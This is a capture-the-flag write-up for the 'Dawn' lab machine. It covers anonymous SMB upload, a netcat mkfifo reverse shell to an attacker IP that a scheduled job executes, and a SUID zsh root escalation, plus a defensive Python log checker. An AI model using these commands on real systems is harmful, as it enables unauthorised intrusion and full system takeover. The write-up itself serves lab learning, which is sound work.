# Dawn

## Nmap

```
sudo nmap 192.168.152.11 -p- -sS -sV

PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.5.5-10.3.15-MariaDB-1
Service Info: Host: DAWN
```

On port 445 we are able to list shares without credentials. We see the share ITDEPT is open to us.

```
smbclient -U '' -L \\\\192.168.152.11\\
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2882a9ef2c440c761bc8fd7dbde3caca5ead732b%2Fimage.png?alt=media)

We then connect directly to the ITDEPT share.

```
smbclient -U '' \\\\192.168.152.11\\ITDEPT
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c6c5d389dd0f5ebc089628aed4769f45256c1e76%2Fimage.png?alt=media)

I then used `curl` to test for file upload on the share and confirmed I was able to upload a PHP reverse shell, which might come in handy later.

```
curl --upload-file /home/kali/scripts/phpshell.php -u '' smb://192.168.152.11/ITDEPT//phpshell.php
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ab948668f761e41b57258df14b0c228b2962a6da%2Fimage.png?alt=media)

Running `dirsearch.py` on port 80 reveals two interesting directories.

```
python3 dirsearch.py -u http://192.168.152.11 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 --full-url
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e2d5f7ae07820b3eeae399605ba4275b78fd9b62%2Fimage.png?alt=media)

Moving into `logs` shows a list of log files, of which `management.log` is the only one we have permission to access.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1f30fdd5984a308d56e2a602e63f15dc5330812e%2Fimage.png?alt=media)

When reading the log file we have the lines below appearing frequently.

```
2020/08/12 09:25:0 CMD: UID=33   PID=1360   | /bin/sh -c /home/dawn/ITDEPT/web-control
2020/08/12 09:25:0 CMD: UID=1000 PID=1359   | /bin/sh -c /home/dawn/ITDEPT/product-control
```
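The security-relevant point in these lines is that scheduled jobs (running as UID 33 and UID 1000) execute scripts from `/home/dawn/ITDEPT`, the same directory exported as an anonymously writable SMB share. The following Python check is an added example, not part of the original writeup: it parses lines in this `management.log` format and flags any command whose target lives inside an exported share directory, so an administrator can spot this class of misconfiguration from the log alone. The log lines and the list of exported directories are constructed assumptions modelled on the page.

```python
import re
from pathlib import PurePosixPath

# Log format seen in management.log above; the seconds field may be a single digit.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{1,2}) CMD: UID=(?P<uid>\d+)\s+"
    r"PID=(?P<pid>\d+)\s+\|\s+(?P<cmd>.*)$"
)

# Constructed sample lines, modelled on the two shown in the writeup plus one benign job.
SAMPLE_LOG = """\
2020/08/12 09:25:0 CMD: UID=33   PID=1360   | /bin/sh -c /home/dawn/ITDEPT/web-control
2020/08/12 09:25:0 CMD: UID=1000 PID=1359   | /bin/sh -c /home/dawn/ITDEPT/product-control
2020/08/12 09:26:0 CMD: UID=0    PID=1400   | /usr/sbin/logrotate /etc/logrotate.conf
"""

# Assumption: directories exported as writable SMB shares (taken from smb.conf or smbclient -L).
EXPORTED_DIRS = ["/home/dawn/ITDEPT"]


def parse_line(line):
    """Return (ts, uid, pid, cmd) for one management.log line, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m.group("ts"), int(m.group("uid")), int(m.group("pid")), m.group("cmd")


def target_paths(cmd):
    """Absolute paths referenced by a command, including the argument of '/bin/sh -c'."""
    return [tok for tok in cmd.split() if tok.startswith("/")]


def under_exported_dir(path):
    """True if path sits anywhere below one of the exported share directories."""
    p = PurePosixPath(path)
    return any(PurePosixPath(d) in p.parents for d in EXPORTED_DIRS)


def find_share_executions(log_text):
    """Flag scheduled commands that execute files living inside an exported share."""
    findings = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, uid, pid, cmd = parsed
        hits = [p for p in target_paths(cmd) if under_exported_dir(p)]
        if hits:
            # A root job running from a writable share is the worst case; rank it higher.
            findings.append({"ts": ts, "uid": uid, "pid": pid, "path": hits[0],
                             "severity": "high" if uid == 0 else "medium"})
    return findings
```

On the sample log this reports the two `ITDEPT` jobs and ignores the `logrotate` entry; a real deployment would read `/var/log` or the share's log directory instead of the embedded string.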

Knowing that we have write access to the ITDEPT share, we can upload a reverse shell named web-control, and in theory it should be executed by the scheduled job.

Firstly I created a file called web-control and inserted a `netcat` reverse shell into it.

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.152 80 >/tmp/f
```

This was then uploaded to the SMB share.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-db292127dfe563d76f068bad86df07977280daea%2Fimage.png?alt=media)

After doing so I soon receive a shell back on my `netcat` listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-eafc186d1aa63a9163dc5c58cc8e7747bc1c73b1%2Fimage.png?alt=media)

Then we can upgrade the shell to something nicer.

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

After doing so I transferred `linpeas` over from my attacking machine by uploading it to the SMB share. Running linpeas identifies the binary `zsh` as having the SUID bit set.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-aa105ce8cc5990bf08f0c191fbc7aca798feceea%2Fimage.png?alt=media)

As `zsh` is a shell binary, all we need to do is execute it by its full path to gain a root shell.

```
/usr/bin/zsh
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-75bfea58de950d9145ed62356d36870880dc8494%2Fimage.png?alt=media)
